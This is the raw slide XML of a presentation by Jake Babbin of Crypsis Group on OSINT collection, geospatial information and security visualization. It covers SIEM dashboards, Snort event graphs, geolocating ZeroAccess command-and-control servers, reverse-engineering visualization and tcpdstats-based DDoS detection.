        <a:buFont typeface="Calibri"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paterva.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informatica64.com/foca.aspx"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03.ibm.com/software/products/us/en/analysts-noteboo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pokeo.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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://threatstream.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://enigmaindicators.codeplex.com/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://code.google.com/p/collective-intelligence-framewor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code.google.com/p/collective-intelligence-framework/" TargetMode="External"/><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fbi.gov/about-us/intelligence/discipline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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject6.bin"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject17.bin"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject18.bin"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject7.bin"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject8.bin"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject9.bin"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject10.bin"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject11.bin"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject12.bin"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject13.bin"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject14.bin"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject15.bin"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject16.bin"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing1.vml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout12.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide27.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject1.bin"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject2.bin"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject3.bin"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject4.bin"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject5.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davix.secviz.org/" TargetMode="External"/><Relationship Id="rId4"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OSINT Collection and Geospatial Information </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Jake Babbin </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Crypsis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Group</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6CB578AE-4A26-CC4C-B2F8-EB2C2A85F4AA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>1</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44030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Davix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – Gallery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8231187" y="6464300"/>
            <a:ext cx="455613" cy="215900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{2B23B61D-7848-407F-A498-9F4C233B09A8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 3" descr="secviz_davix_zplot"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="-18187" r="-18187"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1527630"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>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192281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Davix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – Gallery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8231187" y="6464300"/>
            <a:ext cx="455613" cy="215900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{2B23B61D-7848-407F-A498-9F4C233B09A8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 3" descr="secviz_firewall_treemap"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="-18187" r="-18187"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1503440"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>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063150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Possible Uses of Visualization </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Security Operations Centers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>SIEM Tracking </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Warnings and Alerts </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Visual Acuity </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Mapping multiple events </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Analyst Notebook </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Mind mapping example 	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>	Incident Response/Forensics </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Malware C2 (ZeroAccess Trojan)  and Geo-location </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Histograms and file timelines </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Reverse engineering (Danny Quist’s VERA tool) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Actor/attribution (more later) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2B23B61D-7848-407F-A498-9F4C233B09A8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12</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859658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Visualization – SIEM Tracking </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Warnings and Alerts </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 3" descr="arcsight_dashboard_example"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect t="-3739" b="-3739"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1409691"/>
            <a:ext cx="8229600" cy="4525981"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2B23B61D-7848-407F-A498-9F4C233B09A8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>13</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76019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Visualization – SIEM Tracking </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Visual Acuity </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 4" descr="arcsight_Visual_acuity_example"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="-12977" r="-12977"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1409717"/>
            <a:ext cx="8229600" cy="4525929"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2B23B61D-7848-407F-A498-9F4C233B09A8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>14</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0744563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Visualization – Malware C2 to Geo-location </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 4" descr="Jake_Zeroaccess_kml_example.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="-23055" r="-23055"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1409686"/>
            <a:ext cx="8229600" cy="4525991"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2B23B61D-7848-407F-A498-9F4C233B09A8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>15</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8289949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Visualization – Reverse Engineering</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>VERA – DoE LANL Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 3" descr="Vera_example"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect t="-34595" b="-34595"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1409694"/>
            <a:ext cx="8229600" cy="4525975"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2B23B61D-7848-407F-A498-9F4C233B09A8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>16</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030872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Visualization – File Changes and time</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 3" descr="Mandiant_highlighter_example "/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="-20863" r="-20863"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1409698"/>
            <a:ext cx="8229600" cy="4525967"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2B23B61D-7848-407F-A498-9F4C233B09A8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>17</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6008761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971800"/>
            <a:ext cx="8229600" cy="944562"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Examples of Visualization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6CB578AE-4A26-CC4C-B2F8-EB2C2A85F4AA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>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40839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Security Operations Centers </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>SIEM event mapping </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Afterglow in Arcsight </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Splunk and Afterglow </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Network IDS events </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>24 hours of Snort events  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>	Poor mans DDoS detection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Volume based logging </a:t>
            </a:r>
          </a:p>
          <a:p>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19</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128729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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>OSINT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Visualization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Tying it all together</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Conclusions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6CB578AE-4A26-CC4C-B2F8-EB2C2A85F4AA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>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490442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SIEM Event Mapping</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 3" descr="arcsight_visual_graph"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="-40327" r="-40327"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1409700"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2B23B61D-7848-407F-A498-9F4C233B09A8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>20</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339110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24 Hours of NIDS events</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 3" descr="allevents_2010-03-09_thumb.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="-23136" r="-23136"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1409686"/>
            <a:ext cx="8229600" cy="4525990"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2B23B61D-7848-407F-A498-9F4C233B09A8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>21</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171953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Poor Man’s DDoS Detection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="4038600" cy="4906963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Tcpdstats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – OSS tool used to calculate network statistics from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tcpdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> files. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Initial use for DDoS and worm breakout detection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
